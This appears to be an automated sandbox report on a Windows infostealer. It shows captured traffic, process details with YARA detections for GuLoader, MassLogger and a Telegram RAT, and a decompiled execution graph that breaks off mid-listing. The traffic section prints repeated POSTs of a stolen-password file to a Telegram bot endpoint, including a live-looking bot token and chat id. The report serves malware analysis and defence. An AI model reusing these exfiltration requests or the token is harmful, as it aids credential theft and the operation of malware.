                                                                                                            2025-01-10 19:24:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 31 63 62 31 65 32 38 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31b1cb1e2887Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:14 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:14 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:14 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.559248149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:17 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31db50b888a4
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 19:24:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 62 35 30 62 38 38 38 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31db50b888a4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:17 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:17 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:17 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.559250149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:19 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31ebdb3d617f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 19:24:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 62 64 62 33 64 36 31 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31ebdb3d617fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:19 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:19 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:19 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.559252149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:21 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd320498b12c56
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 19:24:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 34 39 38 62 31 32 63 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd320498b12c56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:21 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:21 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:21 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.559254149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:23 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3216662c95df
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 19:24:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 36 36 36 32 63 39 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3216662c95dfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:23 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:23 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.559256149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:24 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3226cb0eef66
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 19:24:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 36 63 62 30 65 65 66 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3226cb0eef66Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:24 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:24 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:24 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.559258149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:26 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3239ddc2fe6e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 19:24:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 39 64 64 63 32 66 65 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3239ddc2fe6eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:26 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:26 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:26 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:14:22:19
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\FILHKLtCw0.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:475'326 bytes
                                                                                                            MD5 hash:A2C795A981DDC798D11EC6E3ADE42301
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2868592478.0000000003DC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:14:23:42
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\FILHKLtCw0.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:475'326 bytes
                                                                                                            MD5 hash:A2C795A981DDC798D11EC6E3ADE42301
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:21.2%
                                                                                                              Dynamic/Decrypted Code Coverage:13.9%
                                                                                                              Signature Coverage:20.8%
                                                                                                              Total number of Nodes:1517
                                                                                                              Total number of Limit Nodes:46
                                                                                                              execution_graph 4778 402840 4779 402bbf 18 API calls 4778->4779 4781 40284e 4779->4781 4780 402864 4783 405c05 2 API calls 4780->4783 4781->4780 4782 402bbf 18 API calls 4781->4782 4782->4780 4784 40286a 4783->4784 4806 405c2a GetFileAttributesW CreateFileW 4784->4806 4786 402877 4787 402883 GlobalAlloc 4786->4787 4788 40291a 4786->4788 4791 402911 CloseHandle 4787->4791 4792 40289c 4787->4792 4789 402922 DeleteFileW 4788->4789 4790 402935 4788->4790 4789->4790 4791->4788 4807 403258 SetFilePointer 4792->4807 4794 4028a2 4795 403242 ReadFile 4794->4795 4796 4028ab GlobalAlloc 4795->4796 4797 4028bb 4796->4797 4798 4028ef 4796->4798 4799 403027 32 API calls 4797->4799 4800 405cdc WriteFile 4798->4800 4801 4028c8 4799->4801 4802 4028fb GlobalFree 4800->4802 4804 4028e6 GlobalFree 4801->4804 4803 403027 32 API calls 4802->4803 4805 40290e 4803->4805 4804->4798 4805->4791 4806->4786 4807->4794 4808 10001000 4811 1000101b 4808->4811 4818 10001516 4811->4818 4813 10001020 4814 10001024 4813->4814 4815 10001027 GlobalAlloc 4813->4815 4816 1000153d 3 API calls 4814->4816 4815->4814 4817 10001019 4816->4817 4820 1000151c 4818->4820 4819 10001522 4819->4813 4820->4819 4821 1000152e GlobalFree 4820->4821 4821->4813 4822 401cc0 4823 402ba2 18 API calls 4822->4823 4824 401cc7 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401ccf GetDlgItem 4825->4826 4827 402531 4826->4827 4828 4029c0 4829 402ba2 18 API calls 4828->4829 4830 4029c6 4829->4830 4831 4029f9 4830->4831 4833 40281e 4830->4833 4834 4029d4 4830->4834 4832 406077 18 API calls 4831->4832 4831->4833 4832->4833 4834->4833 4836 405f9c wsprintfW 4834->4836 4836->4833 4198 403c41 4199 403d94 4198->4199 4200 403c59 4198->4200 4202 403de5 4199->4202 4203 403da5 GetDlgItem GetDlgItem 4199->4203 4200->4199 4201 403c65 4200->4201 4205 403c70 SetWindowPos 4201->4205 4206 403c83 4201->4206 4204 403e3f 4202->4204 4212 401389 2 API calls 4202->4212 4207 404119 19 API calls 4203->4207 4208 404165 SendMessageW 4204->4208 4229 403d8f 4204->4229 4205->4206 4209 403ca0 4206->4209 4210 403c88 ShowWindow 4206->4210 4211 403dcf SetClassLongW 4207->4211 4241 403e51 4208->4241 4213 403cc2 4209->4213 4214 403ca8 DestroyWindow 4209->4214 4210->4209 4215 40140b 2 API calls 4211->4215 4216 403e17 4212->4216 4218 403cc7 SetWindowLongW 4213->4218 4219 403cd8 4213->4219 4217 4040c3 4214->4217 4215->4202 4216->4204 4222 403e1b SendMessageW 4216->4222 4228 4040d3 ShowWindow 4217->4228 4217->4229 4218->4229 4220 403d81 4219->4220 4221 403ce4 GetDlgItem 4219->4221 4278 404180 4220->4278 4225 403d14 4221->4225 4226 403cf7 SendMessageW IsWindowEnabled 4221->4226 4222->4229 4223 40140b 2 API calls 4223->4241 4224 4040a4 DestroyWindow EndDialog 4224->4217 4231 403d21 4225->4231 4232 403d68 SendMessageW 4225->4232 4233 403d34 4225->4233 4243 403d19 4225->4243 4226->4225 4226->4229 4228->4229 4230 406077 18 API calls 4230->4241 4231->4232 4231->4243 4232->4220 4236 403d51 4233->4236 4237 403d3c 4233->4237 4235 403d4f 4235->4220 4239 40140b 2 API calls 4236->4239 4240 40140b 2 API calls 4237->4240 4238 404119 19 API calls 4238->4241 4242 403d58 4239->4242 4240->4243 4241->4223 4241->4224 4241->4229 4241->4230 4241->4238 4259 403fe4 DestroyWindow 4241->4259 4269 404119 4241->4269 4242->4220 4242->4243 4275 4040f2 4243->4275 4245 403ecc GetDlgItem 4246 403ee1 4245->4246 4247 403ee9 ShowWindow KiUserCallbackDispatcher 4245->4247 4246->4247 4272 40413b EnableWindow 4247->4272 4249 403f13 EnableWindow 4252 403f27 4249->4252 4250 403f2c GetSystemMenu EnableMenuItem SendMessageW 4251 403f5c SendMessageW 4250->4251 4250->4252 4251->4252 4252->4250 4273 40414e SendMessageW 4252->4273 4274 406055 lstrcpynW 4252->4274 4255 403f8a lstrlenW 4256 406077 18 API calls 4255->4256 4257 403fa0 SetWindowTextW 4256->4257 4258 401389 2 API calls 4257->4258 4258->4241 4259->4217 4260 403ffe CreateDialogParamW 4259->4260 4260->4217 4261 404031 4260->4261 4262 404119 19 API calls 4261->4262 4263 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4262->4263 4264 401389 2 API calls 4263->4264 4265 404082 4264->4265 4265->4229 4266 40408a ShowWindow 4265->4266 4267 404165 SendMessageW 4266->4267 4268 4040a2 4267->4268 4268->4217 4270 406077 18 API calls 4269->4270 4271 404124 SetDlgItemTextW 4270->4271 4271->4245 4272->4249 4273->4252 4274->4255 4276 4040f9 4275->4276 4277 4040ff SendMessageW 4275->4277 4276->4277 4277->4235 4279 404198 GetWindowLongW 4278->4279 4289 404221 4278->4289 4280 4041a9 4279->4280 4279->4289 4281 4041b8 GetSysColor 4280->4281 4282 4041bb 4280->4282 4281->4282 4283 4041c1 SetTextColor 4282->4283 4284 4041cb SetBkMode 4282->4284 4283->4284 4285 4041e3 GetSysColor 4284->4285 4286 4041e9 4284->4286 4285->4286 4287 4041f0 SetBkColor 4286->4287 4288 4041fa 4286->4288 4287->4288 4288->4289 4290 404214 CreateBrushIndirect 4288->4290 4291 40420d DeleteObject 4288->4291 4289->4229 4290->4289 4291->4290 4292 401fc3 4293 401fd5 4292->4293 4302 402087 4292->4302 4315 402bbf 4293->4315 4295 401423 25 API calls 4303 4021e1 4295->4303 4297 402bbf 18 API calls 4298 401fe5 4297->4298 4299 401ffb LoadLibraryExW 4298->4299 4300 401fed GetModuleHandleW 4298->4300 4301 40200c 4299->4301 4299->4302 4300->4299 4300->4301 4321 40649a WideCharToMultiByte 4301->4321 4302->4295 4306 402056 4310 4051b4 25 API calls 4306->4310 4307 40201d 4308 402025 4307->4308 4309 40203c 4307->4309 4366 401423 4308->4366 4324 10001759 4309->4324 4312 40202d 4310->4312 4312->4303 4313 402079 FreeLibrary 4312->4313 4313->4303 4316 402bcb 4315->4316 4317 406077 18 API calls 4316->4317 4318 402bec 4317->4318 4319 401fdc 4318->4319 4320 4062e9 5 API calls 4318->4320 4319->4297 4320->4319 4322 4064c4 GetProcAddress 4321->4322 4323 402017 4321->4323 4322->4323 4323->4306 4323->4307 4325 10001789 4324->4325 4369 10001b18 4325->4369 4327 10001790 4328 100018a6 4327->4328 4329 100017a1 4327->4329 4330 100017a8 4327->4330 4328->4312 4418 10002286 4329->4418 4401 100022d0 4330->4401 4335 1000180c 4341 10001812 4335->4341 4342 1000184e 4335->4342 4336 100017ee 4431 100024a9 4336->4431 4337 100017d7 4350 100017cd 4337->4350 4428 10002b5f 4337->4428 4338 